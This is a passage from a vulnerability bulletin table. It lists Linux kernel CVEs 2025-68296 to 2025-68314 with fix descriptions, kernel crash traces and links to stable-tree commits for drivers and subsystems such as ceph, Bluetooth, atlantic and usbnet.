and radeon support vga_switcheroo. For all other drivers, this change does nothing. | 2025-12-16 | not yet calculated | CVE-2025-68296 | https://git.kernel.org/stable/c/482330f8261b4bea8146d9bd69c1199e5dfcbb5c https://git.kernel.org/stable/c/05814c389b53d2f3a0b9eeb90ba7a05ba77c4c2a https://git.kernel.org/stable/c/eb76d0f5553575599561010f24c277cc5b31d003 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ceph: fix crash in process_v2_sparse_read() for encrypted directories The crash in process_v2_sparse_read() for fscrypt-encrypted directories has been reported. Issue takes place for Ceph msgr2 protocol in secure mode. It can be reproduced by the steps: sudo mount -t ceph :/ /mnt/cephfs/ -o name=admin,fs=cephfs,ms_mode=secure (1) mkdir /mnt/cephfs/fscrypt-test-3 (2) cp area_decrypted.tar /mnt/cephfs/fscrypt-test-3 (3) fscrypt encrypt --source=raw_key --key=./my.key /mnt/cephfs/fscrypt-test-3 (4) fscrypt lock /mnt/cephfs/fscrypt-test-3 (5) fscrypt unlock --key=my.key /mnt/cephfs/fscrypt-test-3 (6) cat /mnt/cephfs/fscrypt-test-3/area_decrypted.tar (7) Issue has been triggered [ 408.072247] ------------[ cut here ]------------ [ 408.072251] WARNING: CPU: 1 PID: 392 at net/ceph/messenger_v2.c:865 ceph_con_v2_try_read+0x4b39/0x72f0 [ 408.072267] Modules linked in: intel_rapl_msr intel_rapl_common intel_uncore_frequency_common intel_pmc_core pmt_telemetry pmt_discovery pmt_class intel_pmc_ssram_telemetry intel_vsec kvm_intel joydev kvm irqbypass polyval_clmulni ghash_clmulni_intel aesni_intel rapl input_leds psmouse serio_raw i2c_piix4 vga16fb bochs vgastate i2c_smbus floppy mac_hid qemu_fw_cfg pata_acpi sch_fq_codel rbd msr parport_pc ppdev lp parport efi_pstore [ 408.072304] CPU: 1 UID: 0 PID: 392 Comm: kworker/1:3 Not tainted 6.17.0-rc7+ [ 408.072307] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.17.0-5.fc42 04/01/2014 [ 408.072310] Workqueue: ceph-msgr ceph_con_workfn [ 408.072314] RIP: 0010:ceph_con_v2_try_read+0x4b39/0x72f0 [ 408.072317] Code: c7 c1 20 f0 d4 ae 50 31 d2 48 c7 c6 60 27 d5 ae 48 c7 c7 f8 8e 6f b0 68 60 38 d5 ae e8 00 47 61 fe 48 83 c4 18 e9 ac fc ff ff <0f> 0b e9 06 fe ff ff 4c 8b 9d 98 fd ff ff 0f 84 64 e7 ff ff 89 85 [ 408.072319] RSP: 0018:ffff88811c3e7a30 EFLAGS: 00010246 [ 408.072322] RAX: ffffed1024874c6f RBX: ffffea00042c2b40 RCX: 0000000000000f38 [ 408.072324] RDX: 0000000000000000 RSI: 0000000000000000 RDI: 0000000000000000 [ 408.072325] RBP: ffff88811c3e7ca8 R08: 0000000000000000 R09: 00000000000000c8 [ 408.072326] R10: 00000000000000c8 R11: 0000000000000000 R12: 00000000000000c8 [ 408.072327] R13: dffffc0000000000 R14: ffff8881243a6030 R15: 0000000000003000 [ 408.072329] FS: 0000000000000000(0000) GS:ffff88823eadf000(0000) knlGS:0000000000000000 [ 408.072331] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 [ 408.072332] CR2: 000000c0003c6000 CR3: 000000010c106005 CR4: 0000000000772ef0 [ 408.072336] PKRU: 55555554 [ 408.072337] Call Trace: [ 408.072338] <TASK> [ 408.072340] ? sched_clock_noinstr+0x9/0x10 [ 408.072344] ? __pfx_ceph_con_v2_try_read+0x10/0x10 [ 408.072347] ? _raw_spin_unlock+0xe/0x40 [ 408.072349] ? finish_task_switch.isra.0+0x15d/0x830 [ 408.072353] ? __kasan_check_write+0x14/0x30 [ 408.072357] ? mutex_lock+0x84/0xe0 [ 408.072359] ? __pfx_mutex_lock+0x10/0x10 [ 408.072361] ceph_con_workfn+0x27e/0x10e0 [ 408.072364] ? metric_delayed_work+0x311/0x2c50 [ 408.072367] process_one_work+0x611/0xe20 [ 408.072371] ? __kasan_check_write+0x14/0x30 [ 408.072373] worker_thread+0x7e3/0x1580 [ 408.072375] ? __pfx__raw_spin_lock_irqsave+0x10/0x10 [ 408.072378] ? __pfx_worker_thread+0x10/0x10 [ 408.072381] kthread+0x381/0x7a0 [ 408.072383] ? __pfx__raw_spin_lock_irq+0x10/0x10 [ 408.072385] ? __pfx_kthread+0x10/0x10 [ 408.072387] ? __kasan_check_write+0x14/0x30 [ 408.072389] ? recalc_sigpending+0x160/0x220 [ 408.072392] ? _raw_spin_unlock_irq+0xe/0x50 [ 408.072394] ? calculate_sigpending+0x78/0xb0 [ 408.072395] ? __pfx_kthread+0x10/0x10 [ 408.072397] ret_from_fork+0x2b6/0x380 [ 408.072400] ? __pfx_kthread+0x10/0x10 [ 408.072402] ret_from_fork_asm+0x1a/0x30 [ 408.072406] </TASK> [ 408.072407] ---[ end trace 0000000000000000 ]--- [ 408.072418] Oops: general protection fault, probably for non-canonical address 0xdffffc00000000 ---truncated--- | 2025-12-16 | not yet calculated | CVE-2025-68297 | https://git.kernel.org/stable/c/5a3f3e39b18705bc578fae58abacc8ef93c15194 https://git.kernel.org/stable/c/47144748fbf12068ba4b82512098fe1ac748a2e9 https://git.kernel.org/stable/c/7d1b7de853f7d1eefd6d22949bcefc0c25186727 https://git.kernel.org/stable/c/43962db4a6f593903340c85591056a0cef812dfd |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: Bluetooth: btusb: mediatek: Avoid btusb_mtk_claim_iso_intf() NULL deref In btusb_mtk_setup(), we set `btmtk_data->isopkt_intf` to: usb_ifnum_to_if(data->udev, MTK_ISO_IFNUM) That function can return NULL in some cases. Even when it returns NULL, though, we still go on to call btusb_mtk_claim_iso_intf(). As of commit e9087e828827 ("Bluetooth: btusb: mediatek: Add locks for usb_driver_claim_interface()"), calling btusb_mtk_claim_iso_intf() when `btmtk_data->isopkt_intf` is NULL will cause a crash because we'll end up passing a bad pointer to device_lock(). Prior to that commit we'd pass the NULL pointer directly to usb_driver_claim_interface() which would detect it and return an error, which was handled. Resolve the crash in btusb_mtk_claim_iso_intf() by adding a NULL check at the start of the function. This makes the code handle a NULL `btmtk_data->isopkt_intf` the same way it did before the problematic commit (just with a slight change to the error message printed). | 2025-12-16 | not yet calculated | CVE-2025-68298 | https://git.kernel.org/stable/c/2fa09fe98ca3b114d66285f65f7e108fea131815 https://git.kernel.org/stable/c/c3b990e0b23068da65f0004cd38ee31f43f36460 https://git.kernel.org/stable/c/c884a0b27b4586e607431d86a1aa0bb4fb39169c |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: afs: Fix delayed allocation of a cell's anonymous key The allocation of a cell's anonymous key is done in a background thread along with other cell setup such as doing a DNS upcall. In the reported bug, this is triggered by afs_parse_source() parsing the device name given to mount() and calling afs_lookup_cell() with the name of the cell. The normal key lookup then tries to use the key description on the anonymous authentication key as the reference for request_key() - but it may not yet be set and so an oops can happen. This has been made more likely to happen by the fix for dynamic lookup failure. Fix this by firstly allocating a reference name and attaching it to the afs_cell record when the record is created. It can share the memory allocation with the cell name (unfortunately it can't just overlap the cell name by prepending it with "afs@" as the cell name already has a '.' prepended for other purposes). This reference name is then passed to request_key(). Secondly, the anon key is now allocated on demand at the point a key is requested in afs_request_key() if it is not already allocated. A mutex is used to prevent multiple allocation for a cell. Thirdly, make afs_request_key_rcu() return NULL if the anonymous key isn't yet allocated (if we need it) and then the caller can return -ECHILD to drop out of RCU-mode and afs_request_key() can be called. Note that the anonymous key is kind of necessary to make the key lookup cache work as that doesn't currently cache a negative lookup, but it's probably worth some investigation to see if NULL can be used instead. | 2025-12-16 | not yet calculated | CVE-2025-68299 | https://git.kernel.org/stable/c/5613bde937dfac6725e9c3fc766b9d6b8481e55b https://git.kernel.org/stable/c/d27c71257825dced46104eefe42e4d9964bd032e |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: fs/namespace: fix reference leak in grab_requested_mnt_ns lookup_mnt_ns() already takes a reference on mnt_ns. grab_requested_mnt_ns() doesn't need to take an extra reference. | 2025-12-16 | not yet calculated | CVE-2025-68300 | https://git.kernel.org/stable/c/4a16b2a0c1f033f95f5d0b98b9e40e8bf7c4c2c5 https://git.kernel.org/stable/c/fe256e59b8e7f126b2464ee32bd9fee131f0a883 https://git.kernel.org/stable/c/7b6dcd9bfd869eee7693e45b1817dac8c56e5f86 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net: atlantic: fix fragment overflow handling in RX path The atlantic driver can receive packets with more than MAX_SKB_FRAGS (17) fragments when handling large multi-descriptor packets. This causes an out-of-bounds write in skb_add_rx_frag_netmem() leading to kernel panic. The issue occurs because the driver doesn't check the total number of fragments before calling skb_add_rx_frag(). When a packet requires more than MAX_SKB_FRAGS fragments, the fragment index exceeds the array bounds. Fix by assuming there will be an extra frag if buff->len > AQ_CFG_RX_HDR_SIZE, then all fragments are accounted for. And reusing the existing check to prevent the overflow earlier in the code path. This crash occurred in production with an Aquantia AQC113 10G NIC. Stack trace from production environment: ``` RIP: 0010:skb_add_rx_frag_netmem+0x29/0xd0 Code: 90 f3 0f 1e fa 0f 1f 44 00 00 48 89 f8 41 89 ca 48 89 d7 48 63 ce 8b 90 c0 00 00 00 48 c1 e1 04 48 01 ca 48 03 90 c8 00 00 00 <48> 89 7a 30 44 89 52 3c 44 89 42 38 40 f6 c7 01 75 74 48 89 fa 83 RSP: 0018:ffffa9bec02a8d50 EFLAGS: 00010287 RAX: ffff925b22e80a00 RBX: ffff925ad38d2700 RCX: fffffffe0a0c8000 RDX: ffff9258ea95bac0 RSI: ffff925ae0a0c800 RDI: 0000000000037a40 RBP: 0000000000000024 R08: 0000000000000000 R09: 0000000000000021 R10: 0000000000000848 R11: 0000000000000000 R12: ffffa9bec02a8e24 R13: ffff925ad8615570 R14: 0000000000000000 R15: ffff925b22e80a00 FS: 0000000000000000(0000) GS:ffff925e47880000(0000) knlGS:0000000000000000 CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 CR2: ffff9258ea95baf0 CR3: 0000000166022004 CR4: 0000000000f72ef0 PKRU: 55555554 Call Trace: <IRQ> aq_ring_rx_clean+0x175/0xe60 [atlantic] ? aq_ring_rx_clean+0x14d/0xe60 [atlantic] ? aq_ring_tx_clean+0xdf/0x190 [atlantic] ? kmem_cache_free+0x348/0x450 ? aq_vec_poll+0x81/0x1d0 [atlantic] ? __napi_poll+0x28/0x1c0 ? net_rx_action+0x337/0x420 ``` Changes in v4: - Add Fixes: tag to satisfy patch validation requirements. Changes in v3: - Fix by assuming there will be an extra frag if buff->len > AQ_CFG_RX_HDR_SIZE, then all fragments are accounted for. | 2025-12-16 | not yet calculated | CVE-2025-68301 | https://git.kernel.org/stable/c/34147477eeab24077fcfe9649e282849347d760c https://git.kernel.org/stable/c/b0c4d5135b04ea100988e2458c98f2d8564cda16 https://git.kernel.org/stable/c/5d6051ea1b0417ae2f06a8440d22e48fbc8f8997 https://git.kernel.org/stable/c/3be37c3c96b16462394fcb8e15e757c691377038 https://git.kernel.org/stable/c/3fd2105e1b7e041cc24be151c9a31a14d5fc50ab https://git.kernel.org/stable/c/64e47cd1fd631a21bf5a630cebefec6c8fc381cd https://git.kernel.org/stable/c/5ffcb7b890f61541201461580bb6622ace405aec |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net: sxgbe: fix potential NULL dereference in sxgbe_rx() Currently, when skb is null, the driver prints an error and then dereferences skb on the next line. To fix this, let's add a 'break' after the error message to switch to sxgbe_rx_refill(), which is similar to the approach taken by the other drivers in this particular case, e.g. calxeda with xgmac_rx(). Found during a code review. | 2025-12-16 | not yet calculated | CVE-2025-68302 | https://git.kernel.org/stable/c/ac171c3c755499c9f87fe30b920602255f8b5648 https://git.kernel.org/stable/c/18ef3ad1bb57dcf1a9ee61736039aedccf670b21 https://git.kernel.org/stable/c/46e5332126596a2ca791140feab18ce1fc1a3c86 https://git.kernel.org/stable/c/7fd789d6ea4915034eb6bcb72f6883c8151083e5 https://git.kernel.org/stable/c/45b5b4ddb8d6bea5fc1625ff6f163bbb125d49cc https://git.kernel.org/stable/c/88f46c0be77bfe45830ac33102c75be7c34ac3f3 https://git.kernel.org/stable/c/f5bce28f6b9125502abec4a67d68eabcd24b3b17 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: platform/x86: intel: punit_ipc: fix memory corruption This passes the address of the pointer "&punit_ipcdev" when the intent was to pass the pointer itself "punit_ipcdev" (without the ampersand). This means that the: complete(&ipcdev->cmd_complete); in intel_punit_ioc() will write to a wrong memory address corrupting it. | 2025-12-16 | not yet calculated | CVE-2025-68303 | https://git.kernel.org/stable/c/15d560cdf5b36c51fffec07ac2a983ab3bff4cb2 https://git.kernel.org/stable/c/46e9d6f54184573dae1dcbcf6685a572ba6f4480 https://git.kernel.org/stable/c/3e7442c5802146fd418ba3f68dcb9ca92b5cec83 https://git.kernel.org/stable/c/a21615a4ac6fecbb586d59fe2206b63501021789 https://git.kernel.org/stable/c/c2ee6d38996775a19bfdf20cb01a9b8698cb0baa https://git.kernel.org/stable/c/9b9c0adbc3f8a524d291baccc9d0c04097fb4869 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: Bluetooth: hci_core: lookup hci_conn on RX path on protocol side The hdev lock/lookup/unlock/use pattern in the packet RX path doesn't ensure hci_conn* is not concurrently modified/deleted. This locking appears to be leftover from before conn_hash started using RCU commit bf4c63252490b ("Bluetooth: convert conn hash to RCU") and not clear if it had purpose since then. Currently, there are code paths that delete hci_conn* from elsewhere than the ordered hdev->workqueue where the RX work runs in. E.g. commit 5af1f84ed13a ("Bluetooth: hci_sync: Fix UAF on hci_abort_conn_sync") introduced some of these, and there probably were a few others before it. It's better to do the locking so that even if these run concurrently no UAF is possible. Move the lookup of hci_conn and associated socket-specific conn to protocol recv handlers, and do them within a single critical section to cover hci_conn* usage and lookup. syzkaller has reported a crash that appears to be this issue: [Task hdev->workqueue] [Task 2] hci_disconnect_all_sync l2cap_recv_acldata(hcon) hci_conn_get(hcon) hci_abort_conn_sync(hcon) hci_dev_lock hci_dev_lock hci_conn_del(hcon) v-------------------------------- hci_dev_unlock hci_conn_put(hcon) conn = hcon->l2cap_data (UAF) | 2025-12-16 | not yet calculated | CVE-2025-68304 | https://git.kernel.org/stable/c/ec74cdf77310c43b01b83ee898a9bd4b4b0b8e93 https://git.kernel.org/stable/c/79a2d4678ba90bdba577dc3af88cc900d6dcd5ee |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: Bluetooth: hci_sock: Prevent race in socket write iter and sock bind There is a potential race condition between sock bind and socket write iter. bind may free the same cmd via mgmt_pending before write iter sends the cmd, just as syzbot reported in UAF[1]. Here we use hci_dev_lock to synchronize the two, thereby avoiding the UAF mentioned in [1]. [1] syzbot reported: BUG: KASAN: slab-use-after-free in mgmt_pending_remove+0x3b/0x210 net/bluetooth/mgmt_util.c:316 Read of size 8 at addr ffff888077164818 by task syz.0.17/5989 Call Trace: mgmt_pending_remove+0x3b/0x210 net/bluetooth/mgmt_util.c:316 set_link_security+0x5c2/0x710 net/bluetooth/mgmt.c:1918 hci_mgmt_cmd+0x9c9/0xef0 net/bluetooth/hci_sock.c:1719 hci_sock_sendmsg+0x6ca/0xef0 net/bluetooth/hci_sock.c:1839 sock_sendmsg_nosec net/socket.c:727 [inline] __sock_sendmsg+0x21c/0x270 net/socket.c:742 sock_write_iter+0x279/0x360 net/socket.c:1195 Allocated by task 5989: mgmt_pending_add+0x35/0x140 net/bluetooth/mgmt_util.c:296 set_link_security+0x557/0x710 net/bluetooth/mgmt.c:1910 hci_mgmt_cmd+0x9c9/0xef0 net/bluetooth/hci_sock.c:1719 hci_sock_sendmsg+0x6ca/0xef0 net/bluetooth/hci_sock.c:1839 sock_sendmsg_nosec net/socket.c:727 [inline] __sock_sendmsg+0x21c/0x270 net/socket.c:742 sock_write_iter+0x279/0x360 net/socket.c:1195 Freed by task 5991: mgmt_pending_free net/bluetooth/mgmt_util.c:311 [inline] mgmt_pending_foreach+0x30d/0x380 net/bluetooth/mgmt_util.c:257 mgmt_index_removed+0x112/0x2f0 net/bluetooth/mgmt.c:9477 hci_sock_bind+0xbe9/0x1000 net/bluetooth/hci_sock.c:1314 | 2025-12-16 | not yet calculated | CVE-2025-68305 | https://git.kernel.org/stable/c/fe68510fc99bb4b88c9c611f83699749002d515a https://git.kernel.org/stable/c/e90c05fc5bbea956450a05cc3b36b8fa29cf195e https://git.kernel.org/stable/c/69fcb0344bc0dd5b13d7e4e98f8b6bf25a6d4ff7 https://git.kernel.org/stable/c/89bb613511cc21ed5ba6bddc1c9b9ae9c0dad392 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: Bluetooth: btusb: mediatek: Fix kernel crash when releasing mtk iso interface When performing reset tests and encountering abnormal card drop issues that lead to a kernel crash, it is necessary to perform a null check before releasing resources to avoid attempting to release a null pointer. <4>[ 29.158070] Hardware name: Google Quigon sku196612/196613 board (DT) <4>[ 29.158076] Workqueue: hci0 hci_cmd_sync_work [bluetooth] <4>[ 29.158154] pstate: 20400009 (nzCv daif +PAN -UAO -TCO -DIT -SSBS BTYPE=--) <4>[ 29.158162] pc : klist_remove+0x90/0x158 <4>[ 29.158174] lr : klist_remove+0x88/0x158 <4>[ 29.158180] sp : ffffffc0846b3c00 <4>[ 29.158185] pmr_save: 000000e0 <4>[ 29.158188] x29: ffffffc0846b3c30 x28: ffffff80cd31f880 x27: ffffff80c1bdc058 <4>[ 29.158199] x26: dead000000000100 x25: ffffffdbdc624ea3 x24: ffffff80c1bdc4c0 <4>[ 29.158209] x23: ffffffdbdc62a3e6 x22: ffffff80c6c07000 x21: ffffffdbdc829290 <4>[ 29.158219] x20: 0000000000000000 x19: ffffff80cd3e0648 x18: 000000031ec97781 <4>[ 29.158229] x17: ffffff80c1bdc4a8 x16: ffffffdc10576548 x15: ffffff80c1180428 <4>[ 29.158238] x14: 0000000000000000 x13: 000000000000e380 x12: 0000000000000018 <4>[ 29.158248] x11: ffffff80c2a7fd10 x10: 0000000000000000 x9 : 0000000100000000 <4>[ 29.158257] x8 : 0000000000000000 x7 : 7f7f7f7f7f7f7f7f x6 : 2d7223ff6364626d <4>[ 29.158266] x5 : 0000008000000000 x4 : 0000000000000020 x3 : 2e7325006465636e <4>[ 29.158275] x2 : ffffffdc11afeff8 x1 : 0000000000000000 x0 : ffffffdc11be4d0c <4>[ 29.158285] Call trace: <4>[ 29.158290] klist_remove+0x90/0x158 <4>[ 29.158298] device_release_driver_internal+0x20c/0x268 <4>[ 29.158308] device_release_driver+0x1c/0x30 <4>[ 29.158316] usb_driver_release_interface+0x70/0x88 <4>[ 29.158325] btusb_mtk_release_iso_intf+0x68/0xd8 [btusb (HASH:e8b6 5)] <4>[ 29.158347] btusb_mtk_reset+0x5c/0x480 [btusb (HASH:e8b6 5)] <4>[ 29.158361] hci_cmd_sync_work+0x10c/0x188 [bluetooth (HASH:a4fa 6)] <4>[ 29.158430] process_scheduled_works+0x258/0x4e8 <4>[ 29.158441] worker_thread+0x300/0x428 <4>[ 29.158448] kthread+0x108/0x1d0 <4>[ 29.158455] ret_from_fork+0x10/0x20 <0>[ 29.158467] Code: 91343000 940139d1 f9400268 927ff914 (f9401297) <4>[ 29.158474] ---[ end trace 0000000000000000 ]--- <0>[ 29.167129] Kernel panic - not syncing: Oops: Fatal exception <2>[ 29.167144] SMP: stopping secondary CPUs <4>[ 29.167158] ------------[ cut here ]------------ | 2025-12-16 | not yet calculated | CVE-2025-68306 | https://git.kernel.org/stable/c/421e88a0d85782786b7a1764c75518b4845e07b3 https://git.kernel.org/stable/c/faae9f2ea8806f2499186448adbf94689b47b82b https://git.kernel.org/stable/c/4015b979767125cf8a2233a145a3b3af78bfd8fb |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: can: gs_usb: gs_usb_xmit_callback(): fix handling of failed transmitted URBs The driver lacks the cleanup of failed transfers of URBs. This reduces the number of available URBs per error by 1. This leads to reduced performance and ultimately to a complete stop of the transmission. If the sending of a bulk URB fails do proper cleanup: - increase netdev stats - mark the echo_sbk as free - free the driver's context and do accounting - wake the send queue | 2025-12-16 | not yet calculated | CVE-2025-68307 | https://git.kernel.org/stable/c/f7a5560675bd85efaf16ab01a43053670ff2b000 https://git.kernel.org/stable/c/1a588c40a422a3663a52f1c5535e8fb6b044167d https://git.kernel.org/stable/c/4a82072e451eacf24fc66a445e906f5095d215db https://git.kernel.org/stable/c/9c8eb33b7008178b6ce88aa7593d12063ce60ca3 https://git.kernel.org/stable/c/516a0cd1c03fa266bb67dd87940a209fd4e53ce7 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: can: kvaser_usb: leaf: Fix potential infinite loop in command parsers The `kvaser_usb_leaf_wait_cmd()` and `kvaser_usb_leaf_read_bulk_callback` functions contain logic to zero-length commands. These commands are used to align data to the USB endpoint's wMaxPacketSize boundary. The driver attempts to skip these placeholders by aligning the buffer position `pos` to the next packet boundary using `round_up()` function. However, if zero-length command is found exactly on a packet boundary (i.e., `pos` is a multiple of wMaxPacketSize, including 0), `round_up` function will return the unchanged value of `pos`. This prevents `pos` to be increased, causing an infinite loop in the parsing logic. This patch fixes this in the function by using `pos + 1` instead. This ensures that even if `pos` is on a boundary, the calculation is based on `pos + 1`, forcing `round_up()` to always return the next aligned boundary. | 2025-12-16 | not yet calculated | CVE-2025-68308 | https://git.kernel.org/stable/c/58343e0a4d43699f0e2f5b169384bbe4c0217add https://git.kernel.org/stable/c/69c7825df64e24dc15d31631a1fc9145324b1345 https://git.kernel.org/stable/c/028e89c7e8b4346302e88df01cc50e0a1f05791a https://git.kernel.org/stable/c/e9dd83a75a7274edef21682c823bf0b66d7b6b7f https://git.kernel.org/stable/c/0897cea266e39166a36111059ba147192b36592f https://git.kernel.org/stable/c/bd8135a560cf6e64f0b98ed4daadf126a38f7f48 https://git.kernel.org/stable/c/0c73772cd2b8cc108d5f5334de89ad648d89b9ec |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: PCI/AER: Fix NULL pointer access by aer_info The kzalloc(GFP_KERNEL) may return NULL, so all accesses to aer_info->xxx will result in kernel panic. Fix it. | 2025-12-16 | not yet calculated | CVE-2025-68309 | https://git.kernel.org/stable/c/6618243bcc3f60825f761a41ed65fef9fe97eb25 https://git.kernel.org/stable/c/0a27bdb14b028fed30a10cec2f945c38cb5ca4fa |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: s390/pci: Avoid deadlock between PCI error recovery and mlx5 crdump Do not block PCI config accesses through pci_cfg_access_lock() when executing the s390 variant of PCI error recovery: Acquire just device_lock() instead of pci_dev_lock() as powerpc's EEH and generig PCI AER processing do. During error recovery testing a pair of tasks was reported to be hung: mlx5_core 0000:00:00.1: mlx5_health_try_recover:338:(pid 5553): health recovery flow aborted, PCI reads still not working INFO: task kmcheck:72 blocked for more than 122 seconds. Not tainted 5.14.0-570.12.1.bringup7.el9.s390x #1 "echo 0 > /proc/sys/kernel/hung_task_timeout_secs" disables this message. task:kmcheck state:D stack:0 pid:72 tgid:72 ppid:2 flags:0x00000000 Call Trace: [<000000065256f030>] __schedule+0x2a0/0x590 [<000000065256f356>] schedule+0x36/0xe0 [<000000065256f572>] schedule_preempt_disabled+0x22/0x30 [<0000000652570a94>] __mutex_lock.constprop.0+0x484/0x8a8 [<000003ff800673a4>] mlx5_unload_one+0x34/0x58 [mlx5_core] [<000003ff8006745c>] mlx5_pci_err_detected+0x94/0x140 [mlx5_core] [<0000000652556c5a>] zpci_event_attempt_error_recovery+0xf2/0x398 [<0000000651b9184a>] __zpci_event_error+0x23a/0x2c0 INFO: task kworker/u1664:6:1514 blocked for more than 122 seconds. Not tainted 5.14.0-570.12.1.bringup7.el9.s390x #1 "echo 0 > /proc/sys/kernel/hung_task_timeout_secs" disables this message. task:kworker/u1664:6 state:D stack:0 pid:1514 tgid:1514 ppid:2 flags:0x00000000 Workqueue: mlx5_health0000:00:00.0 mlx5_fw_fatal_reporter_err_work [mlx5_core] Call Trace: [<000000065256f030>] __schedule+0x2a0/0x590 [<000000065256f356>] schedule+0x36/0xe0 [<0000000652172e28>] pci_wait_cfg+0x80/0xe8 [<0000000652172f94>] pci_cfg_access_lock+0x74/0x88 [<000003ff800916b6>] mlx5_vsc_gw_lock+0x36/0x178 [mlx5_core] [<000003ff80098824>] mlx5_crdump_collect+0x34/0x1c8 [mlx5_core] [<000003ff80074b62>] mlx5_fw_fatal_reporter_dump+0x6a/0xe8 [mlx5_core] [<0000000652512242>] devlink_health_do_dump.part.0+0x82/0x168 [<0000000652513212>] devlink_health_report+0x19a/0x230 [<000003ff80075a12>] mlx5_fw_fatal_reporter_err_work+0xba/0x1b0 [mlx5_core] No kernel log of the exact same error with an upstream kernel is available - but the very same deadlock situation can be constructed there, too: - task: kmcheck mlx5_unload_one() tries to acquire devlink lock while the PCI error recovery code has set pdev->block_cfg_access by way of pci_cfg_access_lock() - task: kworker mlx5_crdump_collect() tries to set block_cfg_access through pci_cfg_access_lock() while devlink_health_report() had acquired the devlink lock. A similar deadlock situation can be reproduced by requesting a crdump with > devlink health dump show pci/<BDF> reporter fw_fatal while PCI error recovery is executed on the same <BDF> physical function by mlx5_core's pci_error_handlers. On s390 this can be injected with > zpcictl --reset-fw <BDF> Tests with this patch failed to reproduce that second deadlock situation, the devlink command is rejected with "kernel answers: Permission denied" - and we get a kernel log message of: mlx5_core 1ed0:00:00.1: mlx5_crdump_collect:50:(pid 254382): crdump: failed to lock vsc gw err -5 because the config read of VSC_SEMAPHORE is rejected by the underlying hardware. Two prior attempts to address this issue have been discussed and ultimately rejected [see link], with the primary argument that s390's implementation of PCI error recovery is imposing restrictions that neither powerpc's EEH nor PCI AER handling need. Tests show that PCI error recovery on s390 is running to completion even without blocking access to PCI config space. | 2025-12-16 | not yet calculated | CVE-2025-68310 | https://git.kernel.org/stable/c/d0df2503bc3c2be385ca2fd96585daad1870c7c5 https://git.kernel.org/stable/c/b63c061be622b17b495cbf78a6d5f2d4c3147f8e https://git.kernel.org/stable/c/3591d56ea9bfd3e7fbbe70f749bdeed689d415f9 https://git.kernel.org/stable/c/54f938d9f5693af8ed586a08db4af5d9da1f0f2d https://git.kernel.org/stable/c/0fd20f65df6aa430454a0deed8f43efa91c54835 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: tty: serial: ip22zilog: Use platform device for probing After commit 84a9582fd203 ("serial: core: Start managing serial controllers to enable runtime PM") serial drivers need to provide a device in struct uart_port.dev otherwise an oops happens. To fix this issue for ip22zilog driver switch driver to a platform driver and setup the serial device in sgi-ip22 code. | 2025-12-16 | not yet calculated | CVE-2025-68311 | https://git.kernel.org/stable/c/460e0dc9af2d7790d5194c6743d79f9b77b58836 https://git.kernel.org/stable/c/77a196ca904d66c8372aa8fbfc1c4ae3a66dee2e https://git.kernel.org/stable/c/3fc36ae6abd263a5cbf93b2f5539eccc1fc753f7 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: usbnet: Prevents free active kevent The root cause of this issue are: 1. When probing the usbnet device, executing usbnet_link_change(dev, 0, 0); put the kevent work in global workqueue. However, the kevent has not yet been scheduled when the usbnet device is unregistered. Therefore, executing free_netdev() results in the "free active object (kevent)" error reported here. 2. Another factor is that when calling usbnet_disconnect()->unregister_netdev(), if the usbnet device is up, ndo_stop() is executed to cancel the kevent. However, because the device is not up, ndo_stop() is not executed. The solution to this problem is to cancel the kevent before executing free_netdev(). | 2025-12-16 | not yet calculated | CVE-2025-68312 | https://git.kernel.org/stable/c/285d4b953f2ca03c358f986718dd89ee9bde632e https://git.kernel.org/stable/c/88a38b135d69f5db9024ff6527232f1b51be8915 https://git.kernel.org/stable/c/43005002b60ef3424719ecda16d124714b45da3b https://git.kernel.org/stable/c/3a10619fdefd3051aeb14860e4d4335529b4e94d https://git.kernel.org/stable/c/9a579d6a39513069d298eee70770bbac8a148565 https://git.kernel.org/stable/c/2ce1de32e05445d77fc056f6ff8339cfb78a5f84 https://git.kernel.org/stable/c/5158fb8da162e3982940f30cd01ed77bdf42c6fc https://git.kernel.org/stable/c/420c84c330d1688b8c764479e5738bbdbf0a33de |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: x86/CPU/AMD: Add RDSEED fix for Zen5 There's an issue with RDSEED's 16-bit and 32-bit register output variants on Zen5 which return a random value of 0 "at a rate inconsistent with randomness while incorrectly signaling success (CF=1)". Search the web for AMD-SB-7055 for more detail. Add a fix glue which checks microcode revisions. [ bp: Add microcode revisions checking, rewrite. ] | 2025-12-16 | not yet calculated | CVE-2025-68313 | https://git.kernel.org/stable/c/e980de2ff109dacb6d9d3a77f01b27c467115ecb https://git.kernel.org/stable/c/36ff93e66d0efc46e39fab536a9feec968daa766 https://git.kernel.org/stable/c/607b9fb2ce248cc5b633c5949e0153838992c152 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm/msm: make sure last_fence is always updated Update last_fence in the vm-bind path instead of kernel managed path. last_fence is used to wait for work to finish in vm_bind contexts but not used for kernel managed contexts. This fixes a bug where last_fence is not waited on context close leading to faults as resources are freed while in use. Patchwork: https://patchwork.freedesktop.org/patch/680080/ | 2025-12-16 | not yet calculated | CVE-2025-68314 | https://git.kernel.org/stable/c/8ee817ceafba266d9c6f3a09babd2ac7441d9a2b https://git.kernel.org/stable/c/86404a9e3013d814a772ac407573be5d3cd4ee0d |
